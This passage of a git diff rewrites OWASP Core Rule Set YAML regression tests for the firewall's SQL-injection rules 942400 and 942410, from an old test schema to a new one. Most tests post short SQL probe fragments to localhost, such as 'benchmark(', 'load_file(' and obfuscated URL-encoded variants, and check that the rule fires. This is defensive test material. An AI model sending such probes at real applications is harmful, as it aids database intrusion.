attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942400] + - test_id: 2 desc: "SQL Injection Attack - false positive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and 7 oranges" - version: HTTP/1.0 - output: - no_log_contains: id "942400" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and 7 oranges" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942400] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 75f5667..a3ee7e8 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -1,2013 +1,2011 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942410.yaml +rule_id: 942410 tests: - - test_title: 942410-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ABS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cast(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CAST(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "char(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chaR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CHR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COALESCE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Compress (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnCaT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat_ws(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "convert(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnVeRt(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COUNT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CURRENT_USER(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "date(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=date%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day.+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day%26%27%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=decode%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=default%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ELT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=encode%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ExtractValue%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=EXTRACTVALUE%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=floor%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FLOOR+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=format%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=GROUP_CONCAT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%21%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IFNULL%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=in+%27%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN%2F%2A%2A%2F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-45 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=insert%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-46 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=left%27%29%3F%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-47 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LEFT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-48 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-49 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-50 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-51 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%21%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-52 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-53 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LENGTH%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-54 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-55 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln%29+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-56 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=load_file%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-57 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=local%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-58 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-59 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-60 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=lower%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-61 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAKE_SET%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-62 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAX%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-63 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-64 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-65 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MID%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-66 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=minute+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-67 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=month%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-68 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "name_const(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-69 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "now(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-70 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "nOW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-71 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 